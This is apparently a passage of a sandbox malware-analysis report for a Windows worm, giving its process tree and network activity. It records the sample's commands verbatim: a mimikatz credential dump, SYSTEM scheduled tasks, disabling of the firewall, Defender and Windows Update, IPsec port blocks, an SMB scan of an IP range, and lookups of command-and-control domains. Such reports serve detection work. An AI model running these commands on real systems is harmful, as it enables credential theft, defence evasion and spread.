  cmd /c C:\Windows\mpbivectb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mpbivectb\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:4532
- - C:\Windows\mpbivectb\Corporate\vfshost.exe
    C:\Windows\mpbivectb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "linbbmwti" /ru system /tr "cmd /c C:\Windows\ime\ktlbbtb.exe"
  2⤵
  PID:2528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2720
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "linbbmwti" /ru system /tr "cmd /c C:\Windows\ime\ktlbbtb.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mzlbgtmmj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F"
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mzlbgtmmj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "giepneiit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "giepneiit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1196
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2864
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2728
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3988
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2968
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2308
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3928
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4456
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:628
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3232
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4768
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:2624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3444
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4052
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3708
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3672
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:2044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3936
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5000
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4344
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2788
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4356
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4324
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 776 C:\Windows\TEMP\mpbivectb\776.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3676
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 336 C:\Windows\TEMP\mpbivectb\336.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4552
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2132 C:\Windows\TEMP\mpbivectb\2132.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2596
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2556 C:\Windows\TEMP\mpbivectb\2556.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4520
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2684 C:\Windows\TEMP\mpbivectb\2684.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4544
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2888 C:\Windows\TEMP\mpbivectb\2888.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3168 C:\Windows\TEMP\mpbivectb\3168.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4528
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3840 C:\Windows\TEMP\mpbivectb\3840.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:1324
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3968 C:\Windows\TEMP\mpbivectb\3968.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3508
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 4056 C:\Windows\TEMP\mpbivectb\4056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 680 C:\Windows\TEMP\mpbivectb\680.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1304
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3160 C:\Windows\TEMP\mpbivectb\3160.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4424
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 4200 C:\Windows\TEMP\mpbivectb\4200.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4396
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2524 C:\Windows\TEMP\mpbivectb\2524.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2956
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3904 C:\Windows\TEMP\mpbivectb\3904.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2436
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2848 C:\Windows\TEMP\mpbivectb\2848.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:60
- C:\Windows\TEMP\mpbivectb\yubiiieib.exe
  C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 5116 C:\Windows\TEMP\mpbivectb\5116.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\mpbivectb\iuzcjcmlt\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1944
- - C:\Windows\mpbivectb\iuzcjcmlt\btpbguneu.exe
    btpbguneu.exe TCP 181.215.0.1 181.215.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3788

C:\Windows\SysWOW64\tyxtue.exe
C:\Windows\SysWOW64\tyxtue.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4836

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ktlbbtb.exe
1⤵
PID:4140
- C:\Windows\ime\ktlbbtb.exe
  C:\Windows\ime\ktlbbtb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3656

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
1⤵
PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4516
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
  2⤵
  PID:4280

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
1⤵
PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4388
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
  2⤵
  PID:708

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ktlbbtb.exe
1⤵
PID:4400
- C:\Windows\ime\ktlbbtb.exe
  C:\Windows\ime\ktlbbtb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5468

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
1⤵
PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3560
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
  2⤵
  PID:2584

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
1⤵
PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3580
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
  2⤵
  PID:5888

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

pxi.hognoob.se

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

182.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.129.81.91.in-addr.arpa

IN PTR

Response
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

uio.hognoob.se

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

uio.hognoob.se

IN A

Response
DNS

uio.heroherohero.info

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

uio.heroherohero.info

IN A

Response
DNS

yxw.hognoob.se

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

yxw.hognoob.se

IN A

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

200019.ip138.com

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

200019.ip138.com

IN A

Response

200019.ip138.com

IN CNAME

waf.ip138.com

waf.ip138.com

IN A

59.57.14.11

waf.ip138.com

IN A

110.81.155.137

waf.ip138.com

IN A

59.57.13.133

waf.ip138.com

IN A

59.57.13.182

waf.ip138.com

IN A

110.81.155.138
DNS

haq.hognoob.se

tyxtue.exe

Remote address:

8.8.8.8:53

Request

haq.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

haq.hognoob.se

tyxtue.exe

Remote address:

8.8.8.8:53

Request

haq.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

haq.hognoob.se

tyxtue.exe

Remote address:

8.8.8.8:53

Request

haq.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxx.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

haq.hognoob.se

tyxtue.exe

Remote address:

8.8.8.8:53

Request

haq.hognoob.se

IN A

Response
DNS

pxi.hognoob.se

btcbnp.exe

Remote address:

8.8.8.8:53

Request

pxi.hognoob.se

IN A

Response
DNS

ifconfig.me

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

ifconfig.me

IN A

Response

ifconfig.me

IN A

34.160.111.145
GET

https://ifconfig.me/

ktlbbtb.exe

Remote address:

34.160.111.145:443

Request

GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ifconfig.me
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Fri, 10 Jan 2025 00:26:16 GMT
content-type: text/html; charset=utf-8
Content-Length: 9519
access-control-allow-origin: *
via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

r11.o.lencr.org

ktlbbtb.exe

Remote address:

8.8.8.8:53

Request

r11.o.lencr.org

IN A

Response

r11.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.105

a1887.dscq.akamai.net

IN A

88.221.135.115

a1887.dscq.akamai.net

IN A

88.221.134.137
GET

http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgQAaSXh9IAQ8jpC1XifBkecVA%3D%3D

ktlbbtb.exe

Remote address:

88.221.135.105:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgQAaSXh9IAQ8jpC1XifBkecVA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "D909E1FFBC4CD7C5293CB13D7A6FC272C2181BE96C51B8BAAB6E80277338A1B6"
Last-Modified: Thu, 09 Jan 2025 13:12:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4395
Expires: Fri, 10 Jan 2025 01:39:32 GMT
Date: Fri, 10 Jan 2025 00:26:17 GMT
Connection: keep-alive
DNS

145.111.160.34.in-addr.arpa

Request

145.111.160.34.in-addr.arpa

IN PTR

Response

145.111.160.34.in-addr.arpa

IN PTR

14511116034bcgoogleusercontentcom
DNS

168.245.100.95.in-addr.arpa

Request

168.245.100.95.in-addr.arpa

IN PTR

Response

168.245.100.95.in-addr.arpa

IN PTR

a95-100-245-168deploystaticakamaitechnologiescom
DNS

105.135.221.88.in-addr.arpa

Request

105.135.221.88.in-addr.arpa

IN PTR

Response

105.135.221.88.in-addr.arpa

IN PTR

a88-221-135-105deploystaticakamaitechnologiescom
DNS

pxi.hognoob.se

Request

pxi.hognoob.se

IN A

Response
DNS

pxx.hognoob.se

Request

pxx.hognoob.se

IN A

Response
DNS

6.4.215.181.in-addr.arpa

Request

6.4.215.181.in-addr.arpa

IN PTR

Response
DNS

35.4.215.181.in-addr.arpa

Request

35.4.215.181.in-addr.arpa

IN PTR

Response
DNS

25.4.215.181.in-addr.arpa

Request

25.4.215.181.in-addr.arpa

IN PTR

Response
DNS

28.4.215.181.in-addr.arpa

Request

28.4.215.181.in-addr.arpa

IN PTR

Response
DNS

56.4.215.181.in-addr.arpa

Request

56.4.215.181.in-addr.arpa

IN PTR

Response
DNS

52.4.215.181.in-addr.arpa

Request

52.4.215.181.in-addr.arpa

IN PTR

Response
DNS

71.4.215.181.in-addr.arpa

Request

71.4.215.181.in-addr.arpa

IN PTR

Response
DNS

73.4.215.181.in-addr.arpa

Request

73.4.215.181.in-addr.arpa

IN PTR

Response
DNS

75.4.215.181.in-addr.arpa

Request

75.4.215.181.in-addr.arpa

IN PTR

Response
DNS

110.4.215.181.in-addr.arpa

Request

110.4.215.181.in-addr.arpa

IN PTR

Response
DNS

109.4.215.181.in-addr.arpa

Request

109.4.215.181.in-addr.arpa

IN PTR

Response
DNS

115.4.215.181.in-addr.arpa

Request

115.4.215.181.in-addr.arpa

IN PTR

Response
DNS

10.5.215.181.in-addr.arpa

Request

10.5.215.181.in-addr.arpa

IN PTR

Response
DNS

4.5.215.181.in-addr.arpa

Request

4.5.215.181.in-addr.arpa

IN PTR

Response
DNS

121.4.215.181.in-addr.arpa

Request

121.4.215.181.in-addr.arpa

IN PTR

Response
DNS

18.5.215.181.in-addr.arpa

Request

18.5.215.181.in-addr.arpa

IN PTR

Response
DNS

24.5.215.181.in-addr.arpa

Request

24.5.215.181.in-addr.arpa

IN PTR

Response
DNS

47.5.215.181.in-addr.arpa

Request

47.5.215.181.in-addr.arpa

IN PTR

Response
DNS

47.5.215.181.in-addr.arpa

Request

47.5.215.181.in-addr.arpa

IN PTR

Response
DNS

198.4.215.181.in-addr.arpa

Request

198.4.215.181.in-addr.arpa

IN PTR

Response
DNS

198.4.215.181.in-addr.arpa

Request

198.4.215.181.in-addr.arpa

IN PTR

Response
DNS

205.4.215.181.in-addr.arpa

Request

205.4.215.181.in-addr.arpa

IN PTR

Response
DNS

205.4.215.181.in-addr.arpa

Request

205.4.215.181.in-addr.arpa

IN PTR

Response
DNS

188.4.215.181.in-addr.arpa

Request

188.4.215.181.in-addr.arpa

IN PTR

Response
DNS

188.4.215.181.in-addr.arpa

Request

188.4.215.181.in-addr.arpa

IN PTR

Response
DNS

60.5.215.181.in-addr.arpa

Request

60.5.215.181.in-addr.arpa

IN PTR

Response
DNS

60.5.215.181.in-addr.arpa

Request

60.5.215.181.in-addr.arpa

IN PTR

Response
DNS

58.4.215.181.in-addr.arpa

Request

58.4.215.181.in-addr.arpa

IN PTR

Response
DNS

58.4.215.181.in-addr.arpa

Request

58.4.215.181.in-addr.arpa

IN PTR

Response
DNS

56.5.215.181.in-addr.arpa

Request

56.5.215.181.in-addr.arpa

IN PTR

Response
DNS

56.5.215.181.in-addr.arpa

Request

56.5.215.181.in-addr.arpa

IN PTR

Response
DNS

51.5.215.181.in-addr.arpa

Request

